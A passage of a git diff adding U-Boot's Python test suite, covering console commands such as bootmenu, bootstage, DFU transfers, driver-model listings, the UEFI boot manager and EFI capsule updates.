child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #unbind the child again and check it doesn't change the tree + tree_old = ubman.run_command('dm tree') + response = ubman.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + tree_new = ubman.run_command('dm tree') + + assert response == '' + assert tree_old == tree_new + + response = ubman.run_command('unbind /bind-test') + assert response == '' diff --git a/test/py/tests/test_bootmenu.py b/test/py/tests/test_bootmenu.py new file mode 100644 index 00000000000..66f3fb8a131 --- /dev/null +++ b/test/py/tests/test_bootmenu.py @@ -0,0 +1,46 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Test bootmenu""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootmenu') +def test_bootmenu(ubman): + """Test bootmenu + + ubman -- U-Boot console + """ + + with ubman.temporary_timeout(500): + ubman.run_command('setenv bootmenu_default 1') + ubman.run_command('setenv bootmenu_0 test 1=echo ok 1') + ubman.run_command('setenv bootmenu_1 test 2=echo ok 2') + ubman.run_command('setenv bootmenu_2 test 3=echo ok 3') + ubman.run_command('bootmenu 2', wait_for_prompt=False) + for i in ('U-Boot Boot Menu', 'test 1', 'test 2', 'test 3', 'autoboot'): + ubman.p.expect([i]) + # Press enter key to execute default entry + response = ubman.run_command(cmd='\x0d', wait_for_echo=False, send_nl=False) + assert 'ok 2' in response + ubman.run_command('bootmenu 2', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press up key to select prior entry followed by the enter key + response = ubman.run_command(cmd='\x1b\x5b\x41\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 1' in response + ubman.run_command('bootmenu 2', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press down key to select next entry followed by the enter key + response = ubman.run_command(cmd='\x1b\x5b\x42\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 3' in response + ubman.run_command('bootmenu 2; echo rc:$?', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press the escape key + response = ubman.run_command(cmd='\x1b', wait_for_echo=False, send_nl=False) + assert 'ok' not in response + assert 'rc:0' in response + ubman.run_command('setenv 
bootmenu_default') + ubman.run_command('setenv bootmenu_0') + ubman.run_command('setenv bootmenu_1') + ubman.run_command('setenv bootmenu_2') diff --git a/test/py/tests/test_bootstage.py b/test/py/tests/test_bootstage.py new file mode 100644 index 00000000000..379c1cae6dd --- /dev/null +++ b/test/py/tests/test_bootstage.py @@ -0,0 +1,62 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Test the bootstage command. + +It is used for checking the boot progress and timing by printing the bootstage +report, stashes the data into memory and unstashes the data from memory. + +Note: This test relies on boardenv_* containing configuration values to define +the data size, memory address, and bootstage magic address (defined in +common/bootstage.c). Without this, bootstage stash and unstash tests will be +automatically skipped. + +For example: +env__bootstage_cmd_file = { + 'addr': 0x200000, + 'size': 0x1000, + 'bootstage_magic_addr': 0xb00757a3, +} +""" + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +def test_bootstage_report(ubman): + output = ubman.run_command('bootstage report') + assert 'Timer summary in microseconds' in output + assert 'Accumulated time:' in output + assert 'dm_r' in output + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_stash_and_unstash(ubman): + f = ubman.config.env.get('env__bootstage_cmd_file', None) + if not f: + pytest.skip('No bootstage environment file is defined') + + addr = f.get('addr') + size = f.get('size') + bootstage_magic = f.get('bootstage_magic_addr') + expected_text = 'dm_r' + + ubman.run_command('bootstage stash %x %x' % (addr, size)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + output = ubman.run_command('md %x 100' % addr) + + # Check BOOTSTAGE_MAGIC address at 4th byte address + assert '0x' + output.split('\n')[0].split()[4] == hex(bootstage_magic) + + # Check expected string in last column of output + output_last_col = ''.join([i.split()[-1] for i in output.split('\n')]) + assert expected_text in output_last_col + + # Check that unstash works as expected + ubman.run_command('bootstage unstash %x %x' % (addr, size)) + output = ubman.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_button.py b/test/py/tests/test_button.py new file mode 100644 index 00000000000..f0d85be896d --- /dev/null +++ b/test/py/tests/test_button.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +def test_button_list(ubman): + """Test listing buttons""" + + response = ubman.run_command('button list; echo rc:$?') + assert('button1' in response) + assert('button2' in response) + assert('rc:0' in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_button_return_code(ubman): + """Test correct reporting of the button status + + The sandbox gpio driver reports the last output value as input value. + We can use this in our test to emulate different input statuses. 
+ """ + + ubman.run_command('gpio set a3; gpio input a3'); + response = ubman.run_command('button button1; echo rc:$?') + assert('on' in response) + assert('rc:0' in response) + + ubman.run_command('gpio clear a3; gpio input a3'); + response = ubman.run_command('button button1; echo rc:$?') + assert('off' in response) + assert('rc:1' in response) + + response = ubman.run_command('button nonexistent-button; echo rc:$?') + assert('not found' in response) + assert('rc:1' in response) diff --git a/test/py/tests/test_cat/conftest.py b/test/py/tests/test_cat/conftest.py new file mode 100644 index 00000000000..320e7ebd295 --- /dev/null +++ b/test/py/tests/test_cat/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for cat command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def cat_data(u_boot_config): + """Set up a file system to be used in cat tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_cat' + image_path = u_boot_config.persistent_data_dir + '/cat.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_cat/test_cat.py b/test/py/tests/test_cat/test_cat.py new file mode 100644 index 00000000000..883803fece7 --- /dev/null +++ b/test/py/tests/test_cat/test_cat.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for cat command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_cat') +def test_cat(ubman, cat_data): + """ Unit test for cat + + Args: + ubman -- U-Boot console + cat_data -- Path to the disk image used for testing. 
+ """ + response = ubman.run_command_list([ + f'host bind 0 {cat_data}', + 'cat host 0 hello']) + assert 'hello world' in response diff --git a/test/py/tests/test_cleanup_build.py b/test/py/tests/test_cleanup_build.py new file mode 100644 index 00000000000..aca90cb1107 --- /dev/null +++ b/test/py/tests/test_cleanup_build.py @@ -0,0 +1,110 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2023 Tobias Deiminger <tdmg@linutronix.de> + +"""Test for unexpected leftovers after make clean""" + +import itertools +import os +import pathlib +import shutil +import sys + +import pytest + +# pylint: disable=redefined-outer-name + + +@pytest.fixture +def tmp_copy_of_builddir(u_boot_config, tmp_path): + """For each test, provide a temporary copy of the initial build directory.""" + if os.path.realpath(u_boot_config.source_dir) == os.path.realpath( + u_boot_config.build_dir + ): + pytest.skip("Leftover detection requires out of tree build.") + return None + shutil.copytree( + u_boot_config.build_dir, + tmp_path, + symlinks=True, + dirs_exist_ok=True, + ) + return tmp_path + + +@pytest.fixture(scope="module") +def run_make(u_boot_log): + """Provide function to run and log make without connecting to u-boot console.""" + runner = u_boot_log.get_runner("make", sys.stdout) + + def _run_make(build_dir, target): + cmd = ["make", f"O={build_dir}", target] + runner.run(cmd) + + yield _run_make + runner.close() + + +@pytest.fixture(scope="module") +def most_generated_files(): + """Path.glob style patterns to describe what should be removed by 'make clean'.""" + return ( + "**/*.c", + "**/*.dtb", + "**/*.dtbo", + "**/*.o", + "**/*.py", + "**/*.pyc", + "**/*.so", + "**/*.srec", + "u-boot*", + "[svt]pl/u-boot*", + ) + + +@pytest.fixture(scope="module") +def all_generated_files(most_generated_files): + """Path.glob style patterns to describe what should be removed by 'make mrproper'.""" + return most_generated_files + (".config", "**/*.h") + + +def find_files(search_dir, include_patterns, exclude_dirs=None): + """Find files matching include_patterns, unless it's in one of exclude_dirs. 
+ + include_patterns -- Path.glob style pattern relative to search dir + exclude_dir -- directories to exclude, expected relative to search dir + """ + matches = [] + exclude_dirs = [] if exclude_dirs is None else exclude_dirs + for abs_path in itertools.chain.from_iterable( + pathlib.Path(search_dir).glob(pattern) for pattern in include_patterns + ): + if abs_path.is_dir(): + continue + rel_path = pathlib.Path(os.path.relpath(abs_path, search_dir)) + if not any( + rel_path.is_relative_to(exclude_dir) for exclude_dir in exclude_dirs + ): + matches.append(rel_path) + return matches + + +def test_clean(run_make, tmp_copy_of_builddir, most_generated_files): + """Test if 'make clean' deletes most generated files.""" + run_make(tmp_copy_of_builddir, "clean") + leftovers = find_files( + tmp_copy_of_builddir, + most_generated_files, + exclude_dirs=["scripts", "test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" + + +def test_mrproper(run_make, tmp_copy_of_builddir, all_generated_files): + """Test if 'make mrproper' deletes current configuration and all generated files.""" + run_make(tmp_copy_of_builddir, "mrproper") + leftovers = find_files( + tmp_copy_of_builddir, + all_generated_files, + exclude_dirs=["test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" diff --git a/test/py/tests/test_dfu.py b/test/py/tests/test_dfu.py new file mode 100644 index 00000000000..7d6f41db7fb --- /dev/null +++ b/test/py/tests/test_dfu.py @@ -0,0 +1,320 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "dfu" command. The test starts DFU in U-Boot, waits for USB +# device enumeration on the host, executes dfu-util multiple times to test +# various transfer sizes, many of which trigger USB driver edge cases, and +# finally aborts the "dfu" command in U-Boot. + +import os +import os.path +import pytest +import utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_usb_dev_node': '/dev/usbdev-p2371-2180', + # This parameter is optional /if/ you only have a single board + # attached to your host at a time. + 'host_usb_port_path': '3-13', + }, +) + +# Optional entries (required only when 'alt_id_test_file' and +# 'alt_id_dummy_file' are specified). +test_file_name = '/dfu_test.bin' +dummy_file_name = '/dfu_dummy.bin' +# Above files are used to generate proper 'alt_info' entry +'alt_info': '/%s ext4 0 2;/%s ext4 0 2' % (test_file_name, dummy_file_name), + +env__dfu_configs = ( + # eMMC, partition 1 + { + 'fixture_id': 'emmc', + 'alt_info': '/dfu_test.bin ext4 0 1;/dfu_dummy.bin ext4 0 1', + 'cmd_params': 'mmc 0', + # This value is optional. + # If present, it specified the set of transfer sizes tested. + # If missing, a default list of sizes will be used, which covers + # various useful corner cases. + # Manually specifying test sizes is useful if you wish to test 4 DFU + # configurations, but don't want to test every single transfer size + # on each, to avoid bloating the overall time taken by testing. + 'test_sizes': (63, 64, 65), + # This value is optional. + # The name of the environment variable that the the dfu command reads + # alt info from. If unspecified, this defaults to dfu_alt_info, which is + # valid for most systems. 
Some systems use a different variable name. + # One example is the Odroid XU3, which automatically generates + # $dfu_alt_info, each time the dfu command is run, by concatenating + # $dfu_alt_boot and $dfu_alt_system. + 'alt_info_env_name': 'dfu_alt_system', + # This value is optional. + # For boards which require the 'test file' alt setting number other than + # default (0) it is possible to specify exact file name to be used as + # this parameter. + 'alt_id_test_file': test_file_name, + # This value is optional. + # For boards which require the 'dummy file' alt setting number other + # than default (1) it is possible to specify exact file name to be used + # as this parameter. + 'alt_id_dummy_file': dummy_file_name, + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) An optional udev rule to give you a persistent value to use in +host_usb_dev_node. For example: + +IMPORT{builtin}="path_id" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="", SYMLINK+="bus/usb/by-path/$env{ID_PATH}" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="?*", SYMLINK+="bus/usb/by-path/$env{ID_PATH}-port$env{.ID_PORT}" +""" + +# The set of file sizes to test. These values trigger various edge-cases such +# as one less than, equal to, and one greater than typical USB max packet +# sizes, and similar boundary conditions. +test_sizes_default = ( + 64 - 1, + 64, + 64 + 1, + 128 - 1, + 128, + 128 + 1, + 960 - 1, + 960, + 960 + 1, + 4096 - 1, + 4096, + 4096 + 1, + 1024 * 1024 - 1, + 1024 * 1024, + 8 * 1024 * 1024, +) + +first_usb_dev_port = None + +@pytest.mark.buildconfigspec('cmd_dfu') +@pytest.mark.requiredtool('dfu-util') +def test_dfu(ubman, env__usb_dev_port, env__dfu_config): + """Test the "dfu" command; the host system must be able to enumerate a USB + device when "dfu" is running, various DFU transfers are tested, and the + USB device must disappear when "dfu" is aborted. + + Args: + ubman: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__dfu_config: The single DFU (memory region) configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + def start_dfu(): + """Start U-Boot's dfu shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. 
+ """ + + utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], True) + fh = utils.attempt_to_open_file( + env__usb_dev_port['host_usb_dev_node']) + if fh: + fh.close() + raise Exception('USB device present before dfu command invoked') + + ubman.log.action( + 'Starting long-running U-Boot dfu shell command') + + dfu_alt_info_env = env__dfu_config.get('alt_info_env_name', \ + 'dfu_alt_info') + + cmd = 'setenv "%s" "%s"' % (dfu_alt_info_env, + env__dfu_config['alt_info']) + ubman.run_command(cmd) + + cmd = 'dfu 0 ' + env__dfu_config['cmd_params'] + ubman.run_command(cmd, wait_for_prompt=False) + ubman.log.action('Waiting for DFU USB device to appear') + fh = utils.wait_until_open_succeeds( + env__usb_dev_port['host_usb_dev_node']) + fh.close() + + def stop_dfu(ignore_errors): + """Stop U-Boot's dfu shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + try: + ubman.log.action( + 'Stopping long-running U-Boot dfu shell command') + ubman.ctrlc() + ubman.log.action( + 'Waiting for DFU USB device to disappear') + utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], ignore_errors) + except: + if not ignore_errors: + raise + + def run_dfu_util(alt_setting, fn, up_dn_load_arg): + """Invoke dfu-util on the host. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + up_dn_load_arg: '-U' or '-D' depending on whether a DFU upload or + download operation should be performed. + + Returns: + Nothing. + """ + + cmd = ['dfu-util', '-a', alt_setting, up_dn_load_arg, fn] + if 'host_usb_port_path' in env__usb_dev_port: + cmd += ['-p', env__usb_dev_port['host_usb_port_path']] + utils.run_and_log(ubman, cmd) + ubman.wait_for('Ctrl+C to exit ...') + + def dfu_write(alt_setting, fn): + """Write a file to the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + run_dfu_util(alt_setting, fn, '-D') + + def dfu_read(alt_setting, fn): + """Read a file from the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + # dfu-util fails reads/uploads if the host file already exists + if os.path.exists(fn): + os.remove(fn) + run_dfu_util(alt_setting, fn, '-U') + + def dfu_write_read_check(size): + """Test DFU transfers of a specific size of data + + This function first writes data to the board then reads it back and + compares the written and read back data. Measures are taken to avoid + certain types of false positives. + + Args: + size: The data size to test. + + Returns: + Nothing. 
+ """ + + test_f = utils.PersistentRandomFile(ubman, + 'dfu_%d.bin' % size, size) + readback_fn = ubman.config.result_dir + '/dfu_readback.bin' + + ubman.log.action('Writing test data to DFU primary ' + + 'altsetting') + dfu_write(alt_setting_test_file, test_f.abs_fn) + + ubman.log.action('Writing dummy data to DFU secondary ' + + 'altsetting to clear DFU buffers') + dfu_write(alt_setting_dummy_file, dummy_f.abs_fn) + + ubman.log.action('Reading DFU primary altsetting for ' + + 'comparison') + dfu_read(alt_setting_test_file, readback_fn) + + ubman.log.action('Comparing written and read data') + written_hash = test_f.content_hash + read_back_hash = utils.md5sum_file(readback_fn, size) + assert(written_hash == read_back_hash) + + # This test may be executed against multiple USB ports. The test takes a + # long time, so we don't want to do the whole thing each time. Instead, + # execute the full test on the first USB port, and perform a very limited + # test on other ports. In the limited case, we solely validate that the + # host PC can enumerate the U-Boot USB device. + global first_usb_dev_port + if not first_usb_dev_port: + first_usb_dev_port = env__usb_dev_port + if env__usb_dev_port == first_usb_dev_port: + sizes = env__dfu_config.get('test_sizes', test_sizes_default) + else: + sizes = [] + + dummy_f = utils.PersistentRandomFile(ubman, + 'dfu_dummy.bin', 1024) + + alt_setting_test_file = env__dfu_config.get('alt_id_test_file', '0') + alt_setting_dummy_file = env__dfu_config.get('alt_id_dummy_file', '1') + + ignore_cleanup_errors = True + try: + start_dfu() + + ubman.log.action( + 'Overwriting DFU primary altsetting with dummy data') + dfu_write(alt_setting_test_file, dummy_f.abs_fn) + + for size in sizes: + with ubman.log.section('Data size %d' % size): + dfu_write_read_check(size) + # Make the status of each sub-test obvious. If the test didn't + # pass, an exception was thrown so this code isn't executed. + ubman.log.status_pass('OK') + ignore_cleanup_errors = False + finally: + stop_dfu(ignore_cleanup_errors) diff --git a/test/py/tests/test_dm.py b/test/py/tests/test_dm.py new file mode 100644 index 00000000000..f4c2ccd1101 --- /dev/null +++ b/test/py/tests/test_dm.py @@ -0,0 +1,84 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Sean Anderson + +import pytest + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_compat(ubman): + """Test that each driver in `dm tree` is also listed in `dm compat`.""" + response = ubman.run_command('dm tree') + driver_index = response.find('Driver') + assert driver_index != -1 + drivers = (line[driver_index:].split()[0] + for line in response[:-1].split('\n')[2:]) + + response = ubman.run_command('dm compat') + bad_drivers = set() + for driver in drivers: + if not driver in response: + bad_drivers.add(driver) + assert not bad_drivers + + # check sorting - output looks something like this: + # testacpi 0 [ ] testacpi_drv |-- acpi-test + # testacpi 1 [ ] testacpi_drv | `-- child + # pci_emul_p 1 [ ] pci_emul_parent_drv |-- pci-emul2 + # pci_emul 5 [ ] sandbox_swap_case_em | `-- emul2@1f,0 + + # The number of '| ' and '--' matches indicate the indent level. We start + # checking sorting only after UCLASS_AXI_EMUL after which the names should + # be sorted. 
+ + response = ubman.run_command('dm tree -s') + lines = response.split('\n')[2:] + stack = [] # holds where we were up to at the previous indent level + prev = '' # uclass name of previous line + start = False + for line in lines: + indent = line.count('| ') + ('--' in line) + cur = line.split()[0] + if not start: + if cur != 'axi_emul': + continue + start = True + + # Handle going up or down an indent level + if indent > len(stack): + stack.append(prev) + prev = '' + elif indent < len(stack): + prev = stack.pop() + + # Check that the current uclass name is not alphabetically before the + # previous one + if 'emul' not in cur and cur < prev: + print('indent', cur >= prev, indent, prev, cur, stack) + assert cur >= prev + prev = cur + + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_drivers(ubman): + """Test that each driver in `dm compat` is also listed in `dm drivers`.""" + response = ubman.run_command('dm compat') + drivers = (line[:20].rstrip() for line in response[:-1].split('\n')[2:]) + response = ubman.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_static(ubman): + """Test that each driver in `dm static` is also listed in `dm drivers`.""" + response = ubman.run_command('dm static') + drivers = (line[:25].rstrip() for line in response[:-1].split('\n')[2:]) + response = ubman.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_uclass(ubman): + response = ubman.run_command("dm uclass") + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_devres(ubman): + response = ubman.run_command("dm devres") diff --git a/test/py/tests/test_efi_bootmgr/conftest.py b/test/py/tests/test_efi_bootmgr/conftest.py new file mode 100644 index 00000000000..0eca025058e --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/conftest.py @@ -0,0 +1,38 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI bootmanager test.""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_bootmgr_data(u_boot_config): + """Set up a file system to be used in UEFI bootmanager tests. + + Args: + u_boot_config -- U-Boot configuration. 
+ + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_bootmgr' + image_path = u_boot_config.persistent_data_dir + '/efi_bootmgr.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py new file mode 100644 index 00000000000..8800e9de5b4 --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI bootmanager +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +@pytest.mark.singlethread +def test_efi_bootmgr(ubman, efi_bootmgr_data): + """ Unit test for UEFI bootmanager + The efidebug command is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + ubman -- U-Boot console + efi_bootmgr_data -- Path to the disk image used for testing. + """ + ubman.run_command(cmd = f'host bind 0 {efi_bootmgr_data}') + + ubman.run_command(cmd = 'efidebug boot add ' \ + '-b 0001 label-1 host 0:1 initrddump.efi ' \ + '-i host 0:1 initrd-1.img -s nocolor') + ubman.run_command(cmd = 'efidebug boot dump') + ubman.run_command(cmd = 'efidebug boot order 0001') + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + ubman.run_command(cmd = 'efidebug boot add ' \ + '-B 0002 label-2 host 0:1 initrddump.efi ' \ + '-I host 0:1 initrd-2.img -s nocolor') + ubman.run_command(cmd = 'efidebug boot dump') + ubman.run_command(cmd = 'efidebug boot order 0002') + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + ubman.run_command(cmd = 'efidebug boot rm 0001') + ubman.run_command(cmd = 'efidebug boot rm 0002') diff --git a/test/py/tests/test_efi_capsule/capsule_common.py b/test/py/tests/test_efi_capsule/capsule_common.py new file mode 100644 index 00000000000..40b3fca809e --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_common.py @@ -0,0 +1,142 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023, Linaro Limited + + +"""Common function for UEFI capsule test.""" + +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR + +def capsule_setup(ubman, disk_img, osindications): + """setup the test + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + osindications -- String of osindications value. 
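+            Pass '0x0000000000000004'
+            (EFI_OS_INDICATIONS_FILE_CAPSULE_DELIVERY_SUPPORTED) to enable
+            capsule-on-disk processing, as the test cases here do, or None
+            to clear the variable.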
+ """ + ubman.run_command_list([ + f'host bind 0 {disk_img}', + 'printenv -e PlatformLangCodes', # workaround for terminal size determination + 'efidebug boot add -b 1 TEST host 0:1 /helloworld.efi', + 'efidebug boot order 1', + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"']) + + if osindications is None: + ubman.run_command('env set -e OsIndications') + else: + ubman.run_command(f'env set -e -nv -bs -rt OsIndications ={osindications}') + + ubman.run_command('env save') + +def init_content(ubman, target, filename, expected): + """initialize test content + + Args: + ubman -- A console connection to U-Boot. + target -- Target address to place the content. + filename -- File name of the content. + expected -- Expected string of the content. + """ + output = ubman.run_command_list([ + 'sf probe 0:0', + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{filename}', + f'sf write 4000000 {target} 10', + 'sf read 5000000 100000 10', + 'md.b 5000000 10']) + assert expected in ''.join(output) + +def place_capsule_file(ubman, filenames): + """place the capsule file + + Args: + ubman -- A console connection to U-Boot. + filenames -- File name array of the target capsule files. + """ + for name in filenames: + ubman.run_command_list([ + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{name}', + f'fatwrite host 0:1 4000000 {CAPSULE_INSTALL_DIR}/{name} $filesize']) + + output = ubman.run_command(f'fatls host 0:1 {CAPSULE_INSTALL_DIR}') + for name in filenames: + assert name in ''.join(output) + +def exec_manual_update(ubman, disk_img, filenames, need_reboot = True): + """execute capsule update manually + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + need_reboot -- Flag indicates whether system reboot is required. + """ + # make sure that dfu_alt_info exists even persistent variables + # are not available. + output = ubman.run_command_list([ + 'env set dfu_alt_info ' + '"sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + + # need to run uefi command to initiate capsule handling + ubman.run_command( + 'env print -e Capsule0000', wait_for_reboot = need_reboot) + +def check_file_removed(ubman, disk_img, filenames): + """check files are removed + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = ubman.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name not in ''.join(output) + +def check_file_exist(ubman, disk_img, filenames): + """check files exist + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = ubman.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + +def verify_content(ubman, target, expected): + """verify the content + + Args: + ubman -- A console connection to U-Boot. + target -- Target address to verify. + expected -- Expected string of the content. 
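+        For example, the test cases call
+        verify_content(ubman, '100000', 'u-boot:New') to check that the
+        16 bytes at SPI flash offset 0x100000 now hold the updated marker
+        string.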
+ """ + output = ubman.run_command_list([ + 'sf probe 0:0', + f'sf read 4000000 {target} 10', + 'md.b 4000000 10']) + assert expected in ''.join(output) + +def do_reboot_dtb_specified(u_boot_config, ubman, dtb_filename): + """do reboot with specified DTB + + Args: + u_boot_config -- U-boot configuration. + ubman -- A console connection to U-Boot. + dtb_filename -- DTB file name. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + ubman.config.dtb = mnt_point + CAPSULE_DATA_DIR \ + + f'/{dtb_filename}' + ubman.restart_uboot() diff --git a/test/py/tests/test_efi_capsule/capsule_defs.py b/test/py/tests/test_efi_capsule/capsule_defs.py new file mode 100644 index 00000000000..3cc695e29b5 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_defs.py @@ -0,0 +1,12 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Directoreis used for authentication and capsule tests.""" + +# Directories +CAPSULE_DATA_DIR = '/EFI/CapsuleTestData' +CAPSULE_INSTALL_DIR = '/EFI/UpdateCapsule' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/' if it is not null. +EFITOOLS_PATH = '' diff --git a/test/py/tests/test_efi_capsule/capsule_gen_binman.dts b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts new file mode 100644 index 00000000000..1a62c260474 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts @@ -0,0 +1,168 @@ +// SPDX-License-Identifier: GPL-2.0+ +/* + * Devicetree for capsule generation through binman + */ + +/dts-v1/; + +#include <sandbox_efi_capsule.h> + +/ { + binman: binman { + multiple-images; + }; +}; + +&binman { + 